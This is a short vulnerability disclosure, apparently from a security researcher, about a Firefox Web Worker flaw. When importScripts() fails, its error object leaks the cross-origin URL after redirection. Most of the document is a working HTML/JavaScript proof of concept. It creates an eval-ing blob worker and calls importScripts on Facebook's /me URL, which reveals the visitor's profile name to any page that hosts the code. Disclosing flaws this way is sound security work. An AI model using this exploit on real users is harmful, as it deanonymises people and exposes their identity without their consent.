Whilst investigating the Worker implementation in Firefox, I noticed that some information leak is happening. Basically, if you go to a URL like http://www.facebook.com/me (assuming you're logged in) you will get redirected to your own facebook page, which usually contains your name in the URL itself.
And in the worker we basically did a try-catch and then I noticed the error object passed had a bit more information than what I noticed in a normal context, I was able to get the URL name after redirection when its supposed to only show the initial URL.
<!DOCTYPE html> <html> <head> <title>SOP bypass using workers - Sensitive data retrieval PoC - Abdulrahman Alqabandi</title> <script type="application/javascript"> window.onload=()=>{ //Our worker. onerror=>log(error) && onmsg=>eval(msg) var workerText='onerror=function(q){console.log("err"+q);};onmessage=function(q){console.log("Will eval:"+q.data);eval(q.data)};'; //Create our worker with some blob: url. var qWorker=new Worker(URL.createObjectURL(new Blob([workerText]))); //Alert any data recieved by our new worker qWorker.onmessage=(q)=>{alert(q.data);}; document.getElementById('qab').onmousedown=()=>{ //This is the vulnerable part. //The importScripts() function does not check cross-origins and will try to execute any data returned by the xorigin url. //However, if we catch an error, the URL is exposed in the error object(after redirection). qWorker.postMessage("try{importScripts('https://m.facebook.com/me')}catch(e){this.postMessage(e.fileName)}"); }; }; </script> </head> <body> <input type="button" value="Get my facebook name!" id="qab"> </body> </html>